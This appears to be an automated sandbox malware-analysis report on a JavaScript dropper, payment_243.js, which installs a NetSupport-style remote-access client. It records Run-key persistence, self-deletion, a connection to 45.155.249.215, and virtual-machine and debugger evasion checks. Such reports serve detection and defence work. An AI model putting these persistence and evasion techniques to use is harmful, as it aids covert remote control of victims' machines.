                                Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                                Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\payment_243.jsJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139ED0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C1020
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11113380 IsIconic,GetTickCount,4_2_11113380
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_11025A90
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113FA0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11025EE0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115BEE0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_110241A0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024880
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110B86C0 Sleep,ExitProcess,4_2_110B86C0
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeWindow / User API: threadDelayed 8214Jump to behavior
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\x225qa0\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\x225qa0\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\x225qa0\webmvorbisencoder.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\x225qa0\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\ProgramData\x225qa0\webmmux.dllJump to dropped file
                                Source: C:\ProgramData\x225qa0\client32.exeEvaded block: after key decisiongraph_4-70988
                                Source: C:\ProgramData\x225qa0\client32.exeEvaded block: after key decisiongraph_4-70590
                                Source: C:\ProgramData\x225qa0\client32.exeEvaded block: after key decisiongraph_4-71200
                                Source: C:\ProgramData\x225qa0\client32.exeEvaded block: after key decisiongraph_4-71431
                                Source: C:\ProgramData\x225qa0\client32.exeEvaded block: after key decisiongraph_4-71735
                                Source: C:\ProgramData\x225qa0\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-70729
                                Source: C:\ProgramData\x225qa0\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-66395
                                Source: C:\ProgramData\x225qa0\client32.exeAPI coverage: 6.0 %
                                Source: C:\ProgramData\x225qa0\client32.exeAPI coverage: 0.5 %
                                Source: C:\Windows\System32\wscript.exe TID: 3436Thread sleep time: -300000s >= -30000sJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exe TID: 3768Thread sleep time: -82250s >= -30000sJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exe TID: 3772Thread sleep time: -30200s >= -30000sJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exe TID: 3800Thread sleep time: -540000s >= -30000sJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exe TID: 3768Thread sleep time: -2053500s >= -30000sJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6A13CA9B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A140B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A140B33
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A140F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A140F84
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13EFE1
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A140702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A140702
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6A13C775
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6A13DA38
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13F8B5
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6A13DF35
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A107C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A107C6D
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13FD86
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13F40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13F40B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13D4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6A13D4FF
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A166C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,6_2_6A166C74
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claaq*
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: C:\ProgramData\x225qa0\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-66365
                                Source: C:\ProgramData\x225qa0\client32.exeAPI call chain: ExitProcess graph end nodegraph_4-66466
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,4_2_110B7F30
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A166C74 VirtualProtect ?,-00000001,00000104,?6_2_6A166C74
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,4_2_1117D104
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_110934A0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_11031780
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11162BB7
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116EC49
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6A0F0807
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A16ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,6_2_6A16ADFC
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A16C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6A16C16F
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_716638F7 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_716638F7

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Windows\System32\wscript.exeFile created: webmvorbisencoder.dll.0.drJump to dropped file
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.155.249.215 80Jump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4990
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11113190 GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe" Jump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeFile opened: Windows Firewall: C:\Windows\SysWOW64\FirewallAPI.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E5B0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109ED30
                                Source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
